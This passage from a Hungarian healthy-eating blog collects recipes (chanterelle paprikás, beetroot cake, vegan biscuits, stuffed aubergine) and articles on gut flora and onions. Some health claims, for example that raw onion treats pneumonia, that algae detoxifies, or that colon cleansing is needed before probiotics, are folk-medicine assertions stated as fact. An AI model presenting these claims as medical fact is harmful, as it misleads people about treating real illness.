helyreállítása, regenerálása . Kiemelkedően oda kell figyelni a táplálkozásunkra is, hiszen a finomított- félkész ételek szinte ellenségei a bélflóránknak, valamint az antibiotikumok is nagy kárt tudnak tenni benne. Az elpuszuló bélbaktériumok helyét más kórokozók, mint pl. a Candida gomba foglalják el. Ebből látszik, hogy a candida esetén (is) nagy hangsúlyt kell fektetni a bélflórára. A bélflóra nagyméretű csökkenésének tünetei: emésztőrendszeri zavarok, bőrtünetek, allergiás panaszok, hajkorpásodás és hajhullás, indokolatlan fáradtság, memóriazavar, nőgyógyászati gyulladások, candida, gyakori megfázás, mind-mind az immunrendszer gyengeségére utal. A bélflóra regenerálása során nagyon fontos, hogy előzőleg tisztítsuk ki a bélrendszert , hiszen csak így tudnak megtelepedni a hasznos baktériumok. Tehát a béltisztítás után lehet probiotikumokat (hasznos baktériumtörzsek) bejuttani. Ezek táplálékai a prebiotikumok (zöldségekben, gyümölcsökben, gabonákban lévő vízben oldható rostok), mint pl. a csicsóka, hagymafélék, bab, borsó, zabpehely. A szinbiotikumok a pro- és prebiotikumok együttesét jelenti, vagyis olyan készítmények, melyek alkalmazása során a két tényező kedvező hatásai érvényesülnek. A következő részben az immunerősítő gyógynövényeket veszem sorra.
Rókagomba paprikás puliszkával
2014. szeptember 9. Fittanyuka
Rókagomba igazi ínyencség. Erdélyben vadon terem és úton-útfélen árulják a “szedők”, nyár derekától egészen ősz végéig. Kimondottan erdélyi fogás a gombapaprikás puliszkával vagyis főtt kukoricadarával. Friss gombából készítettem, természetesen ha nincsen kéznél utcai rókagomba – árus akkor bármelyik kedvenc gombafajtánk megteszi. A gomba nem a könnyen emészthető ételek csoportjába tartozik, de a megfelelő társításokkal, fűszerekkel segíthetjük ezt a folyamatot. Az emésztést segítő fűszerekhez tartozik a magyar konyha jellegzetes fűszerei, mint például az őrölt kömény, édesnemes pirospaprika. Én még csempénsztem bele egy kevés őrölt kardamont, amely szintén puffadásgátló, emésztést segítő, erjedésgátló. A kukoricadara könnyen emészthető, gluténmentes köret. Hozzávalók 4 főre: 500-600 g rókagomba 2-3 kk himalaya só 200 ml kókusztejszín 2 evőkanál kukoricadara 1 evőkanál kókuszolaj késhegynyi őrölt kömény 1 kk édesnemes pirospaprika 1 cikk fokhagyma 1 fej vöröshagyma 2,5 dl bögre kukoricadara A vöröshagymát apróra vágjuk és a kókusz olajon megdinszteljük, majd a megtisztított, leforázott gombát, szűrés után a hagymára “dobjuk” és együtt pároljuk. 5 perc után hozzáadjuk a fűszereket, a kókusztejszínt elkeverjük csomómentesen a keményítővel, 1-2 dl vízzel és hozzáöntjük a gombához. Állandó keverés mellett besűrítjük és utófűszerezzük ha szükséges, belepréseljük a fokhagymát. A kukoricadarát négyszeres mennyiségű vízben, 2 kk sóval, állandó keverés mellett puhára főzzük. Tipp: a darát lobogó vízbe tesszük. Majdnem olyan gyorsan elkészül, mint ahogyan leírtam:). Ideális fogás ebédre a rohanó hétköznapokban.
Gyerekek kedvence csokipuding
2014. szeptember 9. Zöld múzsa
Nem tolong a család a céklás sütiért a vasárnapi asztal körül? Sebaj. Itt egy jolly joker recept, amivel egész biztos, hogy mindenkit le lehet venni a lábáról. Krémes, gyümölcsös, csokis egyszerre és a készen kapható poroknál sokkalta egészségesebb. Barackos tápióka zselé csokipudinggal: Csokipuding hozzávalói: - 2 dl kókuszkrém ( cocomas márkájú ) - 4- 5 dl víz - 2 ek. kukoricakeményítő - 2 ek. zabpehelyliszt - 4 ek. jó minőségű kakaó - 10 dkg jó minőségű étcsokoládé - 1 tk. bourbon vanília őrlemény - csipet só - édesítés ízlés szerint ( méz vagy növényi szirupok ) Barackos tápióka zselé hozzávalói: - 3-4 érett barack - fél citrom leve - 5 dkg tápiókagyöngy - édesítés ízlés szerint ( méz vagy növényi szirupok ) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Egy lábosba beletesszük az összes szilárd összetevőt, majd a kókuszkrém felével csomómentesre keverjük. Ezután öntjük hozzá a kókuszkrém másik felét és a vizet. Lassú lángon kevergetve csomómentes pudingot fűzünk belőle. Miután kész, beletördeljük a tábla csokit is és kavarunk rajta párat, hogy elolvadjon. A tápiókagyöngyöt 10-15 percre beáztatjuk hideg vízben, majd leszűrjük róla a vizet. A barackot apró darabokra vágjuk, ráöntjük a fél citrom levét és lassú lángon elkezdjük főzni. Hozzáadjuk a beáztatott tápiókát és addig főzzük vele, míg a gyöngyök átlátszóvá nem válnak. Ha úgy érezzük, hogy a barack nem elég leveses, akkor főzés közben egy pici vizet adagolhatunk hozzá. Miután kész kihűtjük a csokis és a barackos krémünket, majd édesítjük mézzel vagy más alternatív édesítő sziruppal. Fontos szabály, hogy főzött krémekbe, lekvárokba, szószokba a mézet soha ne hevítsük, mert értékes hatóanyagokat vesztünk el a főzés során. Üvegpoharakban tálaljuk, alulra a barackos zselé, föléje pedig a házi csokipuding kerül. Tetejét kókuszkrémmel díszítjük. Megjegyzés: a recept más gyümölcsökkel is működik, például a most érő mézédes körtével, amit egy pici gyömbérrel bolondíthatunk meg.
Bíborban bársonyban
2014. szeptember 8. Zöld múzsa
Éljen a gasztro forradalom. A stílusok összemosódnak, a népek sajátos fűszerei keverednek, teljes a bábeli zűrzavar a konyha területén (is). Már fel sem kapjuk a fejünket, mikor zöldség kerül a süteményünkbe... követeljük a répatortát, istenítjük a sütőtökös muffint, a céklatorta sem a legújabb trend (torz)szülöttje. Ahány ember annyi igény: gluténmentes, tojásmentes, laktózmentes, mindenmentes, nyers. Egy cseppet sem bánom, hogy éppen ebben a forrongó kulináris világkorszakban kaptam hívást konyhai műveletekre, amikor a nagyanyáink receptes könyvét a spontán rafinéria váltja fel, megbolondítva ezzel az élet ízét. "- Mért változtat meg egy kétszáz éves receptet? - Mert kétszáz év talán éppen elég volt neki." Fordulni látszik a világ. Míg régebben apáról fiúra szállt a tudás, a lányok pedig az anyjuk/nagyanyjuktól tanultak főzni, ma nem ritka eset, mikor a piacon vásárlás közben elbeszélgetek az egyébként friss és zamatos földízű céklát árusító nénikkel és kiderül, a főtt ecetes cékla salátán kívül nincsenek más recept birtokában. Felhívás keringőre, hogy akcióba lendüljek és elmeséljem nekik legutóbbi kedvenc céklás kísérletemet. Cékla nyersen? Cékla sütve? Mindezek hallatára a szomszéd árusok is odasereglenek... változnak a dolgok, benne mi és a cékla helyzete is. Ebben a glutén-és tojásmentes tortában kiéltem minden bíbor hóbortomat. A céklát a mascarponéval tettem lággyá és krémessé, az ősz hangulatát pedig a pirított dióval fokoztam. Került cékla a "piskótába" is, aminek nyomán egyéb édesítésre szinte alig volt szükség. A sült cékla ugyanis olyan koncentrált édes ízvilággal bír, amit mindenképpen érdemes kipróbálni Egy másik érv, ami a torta mellett szól, hihetetlen gyorsan elkészül. Jahhh vagy nincs otthon sült cékla a hűtőben? Ez nagy hiba...orvosolandó. Mascarponés-cékla torta ( 18 cm átmérő ): Tészta hozzávalói: - 20 dkg héjában sült cékla - 4 dkg kölesliszt - 3 dkg barna rizsliszt - 8 dkg zabpehelyliszt - 2 ek. kókuszzsír - 10-12 db áztatott datolya - 1 tk. szódabikarbóna - 1 ek. citromlé - ízlés szerint szegfűszeg, kardamom és fahéj Mascarponés krém hozzávalói: - 25 dkg mascarpone - 2-3 ek. méz ( vagy bármilyen növényi édesítő szirup ) - 1 citrom leve - 1 tk. bourbon vanília - kb. 10 dkg héjában sült cékla A konyhai művelet ott kezdődik, hogy a piacról hazaérkező céklákat megmossuk és alufóliába becsomagolva 200 fokon kb. 60-70 percig sütjük. Nyilván nem érdemes egy cékláért elindítani a sütőt, több cékla megsütése ajánlott egyszerre, amiket a következő napokban különféle céklás ételekhez fel lehet majd használni. Kezdjük a tészta összekeverésével a torta készítést. Keverőtálba öntjük a szilárd összetevőket: lisztek, szódabikarbóna és a fűszerek ízlés szerint. A sült céklát a kókuszzsírral és a beáztatott datolyával egy késes aprítóba tesszük. Nem kell túl simára keverni, maradhatnak benne kisebb datolya és cékla darabok. Ezután a lisztes keverékhez öntjük a céklás masszát, plusz a citrom kifacsart levét. Egy 18 cm átmérőjű tortaformába kanalazzuk, elsimítjuk és 175 fokon 25-30 percig sütjük. Míg a tészta sül, addig elkészíthetjük a mascarponés krémet. A hozzávalókat krémesre turmixoljuk, majd a kihűlt torta tetejét rusztikusan megkenjük vele. Díszítésre használhatunk mascarpone nélküli cékla pürét, valamint pirított mézes diót. Megjegyzés: a torta nagyon egyszerű módon vegán ( tiszta növényi táplálkozás ) receptté alakítható. Ebben az esetben a méz helyett növényi szirup ajánlott ( agavé-, rizs-, juharszirup ), a mascarpone helyett pedig 25 dkg beáztatott kesudiót turmixoljunk össze kb. fél dl vízzel és 2-3 ek. kókuszzsírral.
Csokis avokádókrémmel töltött szilva
2014. szeptember 2. Éltető ételek
Végre itt az ősz, itt a szilva ideje. Többféle-fajta kapható, nekem a stella és a besztercei a kedvenc. Ebből isteni finom lekvár készíthető, valamint aszalható is. No, de ebben a receptben frissen esszük a szilvát. És ez olyan egyszerű és gyors recept, hogy még egy gyerek is könnyűszerrel elkészíti. Finom és dekortaív vendágváró falatok. A szilva édes-savanykás hatása a kakaópor kesernyés ízével, hmmm... isteni finom. Ja, és az aszalt meggy "hab a tortán". Azt ne hagyjuk ki belőle. Hozzávalók: - édes, puha szilva - aszalt meggy Csokikrém: - 1 avokádó - 1-2 evőkanál kakaópor - 1-2 evőkanál kókuszvirág cukor vagy méz - 1-2 csepp narancsolaj Az elkészítésére kétféle módszert adok. A kép alapján szerintem mindenki el tudja készíteni. Az első lehetőség, amikor kettévágjuk a szilvát, majd a mag helyére teszünk egy aszalt meggyet. Erre nyomjuk a csokis krémet. A másik lehetőség, amikor tapat vágunk a szilvának, a másik végét pedig bevágjuk. Kinyomjuk a magot, és a helyére tesszük az aszalt meggyet. Óvatosan belenyomjuk a csokis krémet.
Málnás jégkrémtorta
Málnás jégkrémtortával búcsúzom az augusztustól. Kicsit elszomorodva, mert ez a nyár kevés meleget hozott. A melegebb nyári napokon kivettük a fagyasztóból ezt a tortát, vágtunk egy-egy szeletet és ennyi elég is volt hűsítő édességként, így nem fogyott el azonnal, kitartott egy darabig. (Nyilván, ha többen lettünk volna, egy napot sem ért volna meg.)
Mielőtt azonban elkezdenének ostromolni, és magyaros mentalitással negatív kritikával illetni, pontosan tudom, hogy a hulala nem vegán termék, és igen, hidrogénezés által növényi zsír van benne, no meg tejfehérje, ráadásul aroma és színezék. Annyit legalább megteszek azon ritka alkalmak egyikén, mikor mégis eme bűnözésre vetemedek, hogy a kék színű hulalát választom. Így legalább egyéb más dolgoktól megmenekítem szervezetem. Azzal is tisztában vagyok, hogy sok vegetáriánus, akik fogyasztanak sajtot és tejterméket, használnak hulalát (is).
A recept
Hozzávalók:
o 1 pohár hulala (kék, natúr, tehát nem édesített)
o 2 pohár piros színű gyümölcs - jelen esetben főként málna volt
o kevés nyírfa vagy gyümölcscukor, esetleg méz
o kézi robotgép
o fólia
Elkészítés:
Az alaposan megmosott gyümölcsöket villával összetörjük, hozzáadjuk az édesítőt (nyírfa vagy gyümölcscukor, esetleg méz, de nádcukor is jó). A pohárnyi hulalát egy olyan edénybe öntjük, amiben felverhetjük. Elkezdjük robotgéppel felverni és közben hozzáadjuk a gyümölcsöt (télen kiengedett fagyasztott gyümölcsöt is használhatunk, vagy gyümölcsben dús lekvárt). Amikor a hab kemény lesz, fóliával kibélelünk egy választott tálat. Belekanalazzuk a tömény gyümölcsös tejszínhabot, a fóliát a hab tetejére is hajtjuk és mehet a fagyasztóba. Néhány óra múlva a megdermedt habot, mint egy jégkrémtortát szeletelhetjük.
Paradicsomos bruschetta és egy kis napsütötte Toszkána
2014. augusztus 30. Zizi kalandjai
Az elmúlt években jártunk néhányszor Toszkánában – olyan barátok meghívásának köszönhetően, mint Giulia és Emiko -, de sajnos egy bejegyzés sem született belőle, noha az inspirációt és a jobbnál jobb recepteket megkaptam, amikor ott jártunk. A napokban eszembe jutott, hogy lassan vége a paradicsom szezonnak – mert ugye télen nincsen paradicsom -, szóval, amíg lehet élvezni kell ezeknek a (végre!) napsütötte golyócskáknak az édes, szaftos zamatát. Be is ugrott, hogy van egy ezer éve lefotózott, elfekvőben lévő recept, aminek még most éppen aktualitása is van, így összeszedtem a képeket és végre nekiálltam ennek a bejegyzésnek.
Két éve jártunk a toszkán tengerparti szakaszon. A bázisunk Cecina-ban volt, egy családi apartmanban, ahol nyolcan tanyáztunk és szinte ahányan voltunk, annyi nemzetet képviseltünk – belga, olasz, amerikai-német, ausztrál-japán, magyar -. Az étkezésre nagy gondot fordítottunk, többnyire olasz ételeket főztünk, de igyekeztünk a gyorsaságra helyezni a hangsúlyt, hogy minél több időt tölthessünk a tengerparton vagy éppen egy környékbeli piacon.
Ott a helyszínen is készítettünk bruschettát, amit aztán itthon is megcsináltam. A recept hihetetlen egyszerű, ezért, mint minden egyszerű receptnél, a hangsúly itt is az alapanyagok minőségén van.
Paradicsomos bruschetta
(Recept: Giulia második szakácskönyvéből, I Love Toscana)
Hozzávalók:
- néhány szelet jó minőségű kovászos kenyér, megpirítva
- 400 g paradicsom, felkockázva
- 2 gerezd fokhagyma
- extra szűz olívaolaj
- friss bazsalikom, felaprítva
- só, frissen őrölt bors
Tegyük egy tálba a felkockázott paradicsomot, ízesítsük sóval, borssal. Keverjük össze két evőkanál olívaolajjal, egy felaprított fokhagyma gerezddel és a bazsalikommal. Tegyük a hűtőbe és hagyjuk állni, hogy az ízek összeérjenek két-három óra alatt.
Pirítsuk meg a kenyér szeleteket, extraként megkenhetjük a másik gerezd fokhagymával (aki nem fokhagyma őrült, az kihagyhatja ezt a lépést ). Kanalazzunk a kenyér szeletekre az aprított paradicsomból. Tálaláskor önthetünk még rá egy kevés olívaolajat.
Tipp: a friss bazsalikom mellett adhatunk hozzá még oregánot és mentát is.
*****
Néhány kép az utazásról…
Készül az autentikus bruschetta
Cecina
Reggeli algás turmix
2014. augusztus 23. Éltető ételek
"Mindennapi kenyerünket add meg nekünk ma..." - nos, nekem ez a mindennapi turmixom. Ugyanis ezzel kezdem a napot, de sokszor délután is iszok egy adagot belőle. Az ízére nem mondanám azt, hogy hűűűű, de finom, na de annál egészségesebb. Mind az 5 alapíz érezhető benne, kellően beindítja reggel a "motort". Kiválóan méregtelenít, de nemcsak a méregtelenítés idején ihatjuk, hanem akár folyamatosan is. A grépfruit kellően keserű, így jótékonyan hat a májra és az epére. Az alga szuperül méregtelenít, de ezt még megturbózom egy adag nyírvízzel is. Akkor most nézzük a receptet, hogy én mivel is kezdem mostanában a reggeleket: Hozzávalók (1 főre): - 1/2 piros grépfruit - 2 édes idéngyümölcs (most a barack a sláger) - 1 teáskanál maca por - 1 teáskanál alga por - 1 késhegynyi ceyloni fahéj - 1 tesákanál omega3-citromos halolaj - 1 teáskanál omega3-Q10 halolaj - 1 csipet guarana por (a kávé helyett, szuperül élénkít) - kevés tisztított víz Turmixolás után: - 20 ml supra balance - 30 ml nyírvanedv
Vegán cukormentes tripla szezámos keksz
2014. augusztus 23. Zizi kalandjai
Ez a keksz igazából baba keksznek indult, vagyis Ádinak akartam végre kekszet sütni, mert még sohasem evett. Tudtam, hogy vegán és cukormentes lesz és valószínűleg kerül majd bele banán, de a többi hozzávalót még nem sejtettem mi lesz. Néhány hete belefutottam a szezámlisztbe és kitaláltam, hogy ezzel fogom gazdagítani a kekszet. Isteni magának a lisztnek az illata, de amikor összekevertem a többi hozzávalóval, majd a kekszek a sütőbe kerültek, mennyei illatok járták be a lakást.
A szezámlisztnek magas a fehérjetartalma, így kiváló vegetáriánusok és vegánok számára. Ezenkívül magas a vas, a magnézium, a kálcium és a cink tartalma is. Kiváló sűrítésre is, én azonban sokkal inkább tudom elképzelni sütikben, mint, amilyen ez a keksz is.
A szezámliszten kívül került a kekszbe tahini (ha nem kaptok, saját magatok is készíthettek tahinit), valamint a tetejére szórtam szezámmagot, szóval ez egy fullos szezámos keksz lett. Ha nem juttok szezámliszthez, helyettesíthetitek zab- vagy hajdinaliszttel. A kókuszolaj és a tahini miatt ez egy puha keksz, de úgy gondolom, hogy babának a legmegfelelőbb az állaga és nem baj, hogy nem ropogós. Igazából három banánt tettem volna bele, hogy még egy kicsit édesebb legyen – így a felnőtt ízérzékhez jobban alkalmazkodott volna -, de csak kettő volt itthon. Aki édesebben szeretné fogyasztani, az mindenképpen három banánt tegyen bele!
Vegán cukormentes tripla szezámos keksz
Hozzávalók kb. 18-20 db-hoz:
- 2 db érett banán, meghámozva, villával pépesre törve
- 60 g kókuszolaj
- 50 g szezámliszt
- 50 g tönköly fehérliszt
- 5 evőkanál rizstej
- 1 evőkanál tahini
- 2 teáskanál szódabikarbóna
- 1 vaníliarúd kikapart magjai
- pici csipet só
- szezámmag
Egy tálban keverjük össze a száraz hozzávalókat: szezámliszt, fehérliszt, szódabikarbóna, só. Egy másik tálban keverjük össze a pépesre tört banánokat a kókuszolajjal, a rizstejjel, tahinivel és vaníliával. Jól keverjük el, majd öntsük a száraz hozzávalókhoz. Puha, enyhén ragacsos tésztát kell kapnunk.
Melegítsük elő a sütőt 180C fokra és béleljünk ki egy nagy tepsit sütőpapírral.
Fagyis- vagy evőkanállal adagoljunk gombócokat a sütőpapírra és szórjuk meg a tetejüket szezámmaggal. 15-20 percig süssük, amíg aranybarnák lesznek.
Ádi is jóváhagyja a kekszet
LÉT-REFORM édes-töltött kiflik
2014. augusztus 21. Mindennapi ételeink
Nálunk ma is egész nap esett az eső. Ilyenkor jólesik egy kis "télies csemege". Ilyenek a LÉT-REFORM most bemutatott termékei: a töltött, édes kiflik. Kapható diós, mákos, gesztenyés, szilvalekváros ízesítésben. Mi a gesztenyéset és a mákosat kóstoltuk. Hármasával csomagolva kapható. Gesztenyés kifli Finom, harmonikus ízvilágú termék, nagy előnye, hogy nem tartalmaz élesztőt, és hozzáadott cukrot. A töltelék bőséges benne. Összetevők: teljes kiőrlésű tönkölyliszt, koptatott tönkölyliszt, növényi margarin, alma, natúr gesztenye, szódabikarbóna, só. Mákos kifli Szintén 3 darab található a csomagolásban. Összetevők: teljes kiőrlésű tönkölyliszt, koptatott tönkölyliszt, növényi margarin, alma, mák, szódabikarbóna, só.
Mit eszel, ha vegán leszel?
2014. augusztus 19. Gréta konyhája
Mit eszel Gréta egész nap?-kérdezitek sokan. A válaszom: Minden nap csodás, ízletes fogásokat fogyasztok, minden nap mást, változatosan, amit éppen megkívánok, és aznap jól esik. Még ma is tévhit övezi a vegán életmód megannyi aspektusát. Nem, nem élünk egész nap salátán, de ha egészséges étrendről beszélünk, bizony nem árt szem előtt tartani, hogy elegendő mennyiségű fehérjét, zsírokat és szénhidrátot juttassunk be a szervezetünkbe. Ami nekem bevált: Jó minőségű, lassan felszívódó szénhidrátból álljon étkezésünk kb 70%-a, ilyenek a nyers gyümölcsök, a gabonák(barnarizs, quinoa, köles stb) nyers zöldségek 20%-a legyen növényi fehérje , amit hüvelyesekből(csicseriborsó, borsó, babfélék, lencse stb), húspótlókból,(tofu, tempeh, szejtán) és zöld leveles növényekből szerezhetünk be könnyedén, ráadásul a szénhidrátként elfogyasztott gabonák is tartalmaznak nagy mennyiségben fehérjéket. A maradék 10%-a legyen a jó minőségű zsírok bevitele, amelyeket már egy marék nyers nem sózott, nem pörkölt olajos mag elfogyasztásával meg lehet oldani. Én itthon, most extra szűz olívát, szőlőmag olajat és lenmagolajat használok, salátákra, főzéshez-sütéshez. Reggelim: Gyümölcs...sok sok gyümölcs (görögdinnye, sárgadinnye, őszibarack, szőlő mostanában) Mindig figyeljünk a szezonalitásra. Nyáron nyersen eszem, míg télen is, csak összeturmixolom mindenféle zöld levelekkel és vízzel.
Ebédem: Tofuburger, néha csak sült tofu, fűszeres sült burgonyával, édesburgonyával, zöldséges rizzsel, grill vagy wok zöldségekkel, vagy quinoával cézársalátával, desszertnek kölestorta, gyümölcsös pite, valamilyen puding. Sokszor készítek még ebédre zöldséges rakott ételeket, curry-ket, tésztaételeket mindenféle mennyei szószokkal. Vacsora: Zöldséges sushi, nagy adag mindenféle saláta isteni veganézes öntetekkel, avokádóval, de valamikor csak pirítósra vágyom guacamoléval. Nem állítok fel nehéz szabályokat. Amit követek, az a testem kérése. Délig gyümölcs, vagy préselt levek, délben kiadós fincsi ebéd, vacsora, amit kívánok, de nem túl sok, és lefekvés előtt 3 órával bezárólag elfogyasztva. Sok sok tisztított víz, minden nap legalább 5 perc mozgás. A lényeg! Táplálkozz változatosan, minél természetesebben, jó alapanyagokból, színesen, nyugodtan elfogyasztva, fűszerekkel tarkítva, finoman, jól esően, hogy ne csak a test, hanem a lélek is maradéktalanul jól lakjon.
Krémtúrós palacsintatekercs (vegán)
Az előző két receptemet ötvözve készítettem egy finom édességet. Túróval töltött palacsinta - ez röviden a megnevezés. Hosszan pedig így szólhatna: Krémtúróval töltött lusta asszony meggyes palacsintája. Hasonlóan nagy szeleteket lehetett vágni belőle, mint egy piskótatekercsből. A palacsinta tepsiben sült, és a meggy a tésztájába volt keverve. Persze el lehet készíteni úgy is, hogy a palacsinta tésztáját gyümölcs nélkül sütjük meg és a krémtúróba keverjük a meggyet. Most, barack és dinnyeszezon idején sárgadinnyével, nektarinnal is elkészíthetjük.
A recept
Hozzávalók a krémtúróhoz:
o 1 kisebb bögre köles
o víz
o növényi tej
o édesítő (nyírfacukor, gyümölcscukor, stb.)
o vanília
o citrom
Hozzávalók a palacsintához:
o 1 csésze teljes kiőrlésű liszt
o 1 csésze fehér liszt
o 1 csésze zabpehely liszt (vagy őrölt zabpehely)
o víz
o 1 csipet só
o 2 evőkanál lenmag őrölve
o meggy
o sütőpapír
Elkészítés:
A kölest megfőzzük növényi tejben és a hamis krémtúró receptje szerint ízesítjük. Míg a köles fő, a palacsinta tésztájához összekeverjük a hozzávalókat és egy sütőpapíros tepsiben megsütjük Lusta asszony meggyes palacsintáját. Ebből az adagból két-három tepsiben sült palacsinta is készíthető.
A kihűlt palacsintáról lehúzzuk a sütőpapírt. Majd visszarakjuk a sütőpapírra (konyharuhára is lehet), megtöltjük a krémtúróval és feltekerjük, mint a piskótatekercset. Pihentetjük egy rövid ideig, majd felszeleteljük.
Szezon
2014. augusztus 14. Zöld múzsa
Nem merem azt írni, hogy nyári szezon, mert nem érzem a nyarat. Furcsa fátyolfelhős égre ébredek hosszú napok óta reggelente, hasamra sütő, mosolyt csalogató napsugarak helyett. Extrán párás a levegő, a futás sem esik olyan jól. Délután egy kis szerencsével lehet találkozni direktbe jövő napfénnyel. Mintha a paradicsom mindebből semmit sem érzékelne, de legalábbis beéri a felhők mögüli kacsintgatással és pirosodik mindannyiunk örömére. Idén egy nagyon kedves barátnőm, Klári rámgondolásából lett pár bokor különlegesebb paradicsomom is, mint a "black cherry", ami egy apróbb fajta és beérve nagyon szép sötétbarna színű, valamint a "gold nugget", ami szintén aprócska de szép aranysárga színű, zamatos pari. Érőben még egy azonosítatlan fajta. Úgy tudom sok mag, amit kaptam tőle ebből a webáruházból valók és megbízható fajták. Kaptam még lila sárgarépa, csíkos cékla, mángold és lila bazsalikom magokat, most csak azokat soroltam, amikből ehető termés is kerekedett ;-) A paprika és a padlizsán palánták a gyors földből való kibújás után és a több átültetés ellenére sem találták meg nálunk a jó táptalajt, de jövőre ismét megújult erővel kezdek a kertészkedésbe, talán egy kicsit időben előbb kezdve a magok földbe ültetését nagyobb esélyt adva nekik a kibontakozáshoz. Nagyon érdekes egyébként látni, hogy a kertésztől vásárolt paradicsom palántáink mennyivel erősebb és hatalmasabb növények, ontják az édes-piros gyümölcsöt, de éppen ennek ellenére rém büszke vagyok a sokkal gyengébbecske, magam által nevelgetett bokrok hozamára. Pár üvegbe zártam már a nyár ízéből: bazsalikomos-chilis paradicsomlekvárt készítettem, Kaldenekker recept alapján , mert ehhez írt a legkevesebb cukrot ( 2 kg-hoz 10-15 dkg-ot ), abból is a legbarnábbikat használtam. Nektek meg hoztam egy lecsós kölessel töltött padlizsán receptet, hogy maradjunk a szezonalitásnál. Lecsós kölessel töltött padlizsán: - 2 kicsi padlizsán - 10 dkg köles ( háromszoros mennyiségű sós vízbe megfőzve ) - 2 ek. kókuszzsír - 1 ek. olívaolaj - 1 közepes fej lilahagyma - 1 gerezd fokhagyma - 3-4 db érett paradicsom - 1 db zöld paprika ( nem erős ) - reszelt sajt ( vegánoknak elhagyható ) - chili opcionálisan - só, bors, őrölt kömény ízlés szerint - friss petrezselyem - friss bazsalikom levelek - 10-15 szem fekete olivabogyó ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- A kölest megfőzöm a háromszoros mennyiségű vízben és hagyom kihűlni. A padlizsánokat félbe vágom és kanál segítségével kiszedem a belsejüket. Igyekezzünk ezt úgy csinálni, hogy egy centi vastag kéreg maradjon belül. Vékonyan kikenjük őket olívaolajjal és picit megsózzuk. Egy serpenyőben kókuszzsíron pirítjuk az apróra vágott hagymát. Utána rádobjuk a szintén apróra vágott paprikát, valamint a padlizsán belső részét felaprítva és rányomjuk a gerezd fokhagymát is. A paradicsomok héját lehúzzuk ( ha szükséges forró vízbe dobjuk őket, így könnyedén lejön nekik ) legutolsónak adjuk a lecsóhoz. Fűszerként ízlésünknek megfelelően sót, őrölt köményt ( ... római kömény és koriander hozzáadásával kicsit shakshukás lesz ;-) ... ) a végén pedig frissen őrölt fekete borsot használhatunk. A lecsós ragut összekeverjük a főtt kölessel, a karikákra vágott fekete olívabogyóval és a padlizsánokba töltjük. Előmelegített sütőbe 35-40 percig sütjük és a sütés befejezése előtt megszórjuk reszelt sajttal a padlizsán csónakok tetejét. Friss apróra vágott petrezselyemmel és bazsalikomlevelekkel tálaljuk. Könnyed nyári vacsora vagy vendégváró falat.
Kakukkfüves, fűszeres édesburgonya serpenyőben sütve
Régebben nem voltak oda az édesburgonyáért.
Az édes íze dominált, bármit is készítettem belőle, és nem fért össze a sóssal.
Úgy látszik változnak az idők, ízlések… most újra vásároltam, és olyan finomat sikerült belőle készítenem, hogy csuda!
Az ötletet a tegnapi zöldségnyárs adta, ahova édesburgonya szeleteket is fűztem.
Hozzávalók: édesburgonya (batáta), grill fűszerkeverék, szőlőmag olaj, friss kakukkfű (ha nincs, jó a szárított is),
Elkészítés: Az édesburgonyát meghámozzuk, karikákra szeljük, és feltesszük főni enyhén sós vízben, és félig megfőzzük. Csak annyira, hogy picit megpuhuljon, de ne teljesen. A grill fűszerkeveréket egy kis szőlőmagolajjal összekeverjük, és ebbe forgatjuk a félig főtt édesburgonyát. Hagyhatjuk kicsit pácolódni is, de nem feltétlenül szükséges. Olajozatlan serpenyőben megpirítjuk az egészet, fokhagyma granulátumot még lehet pluszban szórni rá, nagyon jót tesz az ízének. Menet közben ráaprítunk egy kis kakukkfüvet is.
Salsa mártással tálaltam: Turmixolt friss paradicsom (vagy konzerv paradicsompüré), felaprított paradicsom keveréke + salsa fűszerkeverék.
Jó étvágyat!
Gyógyító hagymák. 1.rész Vöröshagyma és gyógyhatásai
2014. augusztus 9. Éltető ételek
A hagyma egy igazi magyar zöldség és fűszernövény, az őseink a mindennapokban rendszeresen fogyasztották. Ösztönösen tudták, hogy jó, kell a szervezetnek. Talán a legismertebb a vöröshagyma és a fokhagyma, a gyógyhatásait a népi gyógyászat is előszeretettel alkalmazta . De ne feledkezzünk meg a zöldhagymáról, medvehagymáról, póréhagyáról, gyöngyhagymáról, lilahagymáról, salátahagymáról vagy akár a metélőhagymáról sem. Én minden nap használok hagymát az ételkészítés során. Nyersen, főzve, sütve, rántva, aszalva... mindenhogy finom . Persze sokan panaszkodnak, hogy nyersen nem bírja a gyomruk. Nos, ilyenkor szerintem nem az a megoldás, hogy nem eszünk hagymát. Utána kell járni az okoknak. (Nekem akkor oldódtak meg a problémák, amikor rendszeresen elkezdtem inni a zöld turmixot.) Legtöbbször gyomrégésre, gyomorsavtúltengésre panaszkodnak. Sok esetben persze a gyomorégést éppen a kevés gyomorsav okozza. Ez úgy lehet, hogy ha kevés sav termelődik, akkor az elfogyasztott étel nem tud elég gyorsan és alaposan megemésztődni, ilyenkor az ott maradt étel erjedni kezd. És éppen ez fog savat termelni, ami irritálja a nyálkahártyát. Egy kis múlt ... Már az ókorban is ismerték és használták, nemcsak a fazékba hanem gyógyításra is. Paracelsus azt mondta: A hagyma olyan értékes, mint egy egész patika. Az ókori Egyiptomban Ízisz szent növénye volt, még a hieroglifák között is megtalálható, mely a termékenység, növekedés szimbólumaként szerepel. 17-18 században a híres makói vöröshagyma Európa szerte ismert lett. Hatóanyagai ... Minden hagyma botanikailag a liliomfélék csoportjába tartozik. Nagyon sok értékes vitaminokat és ásványi anyagokat tartalmaznak, mint például a kálcium, foszfor, kálium, nátrium, magnézium, vas, cink, réz, B vitaminok tárháza, valamint C vitamint is megtalálható bennük . Jellegzetes csípős ízét és illatát egy kéntartalmú vegyület, az alliszulfid adja . Ennek köszönhető baktériumölő hatása, meghűléses időszakokban nagyon hasznos a fertőzések leküldésében. Csípős hatásából következik, hogy melegítő hatása van, ezért lázas betegség esetén nem ajánlott nyersen fogyasztani. Meghűlésre bevethető A vöröshagyma a meghűléses betegségek gyógyszere . A népi gyógyászatban előszeretettel használják hurutos állapotok, légúti betegségek esetén. Reggel éhgyomorra egy kis fej vöröshagymát egyen meg, tisztítja a tüdőt - ezt tarja a néphit. Csökkenti az orrdugulást, illóolaja fellazítja a légutakat befedő nyákos anyagot. Enyhíti a hörghurutot, az erős köhögést és a rekedtséget. Hatékonyan alkalmazható a megfázás, influenza, torok- és mandulagyulladás, sőt a tüdőgyulladás esetén is. Mindenképp próbáljuk ki a hagymateát, mely során a hagyma héját is felhasználjuk. Emésztőszervi és vizeletképző problémák A nyers hagyma megöli a gyomorban és bélben található kórokozókat , erősíti 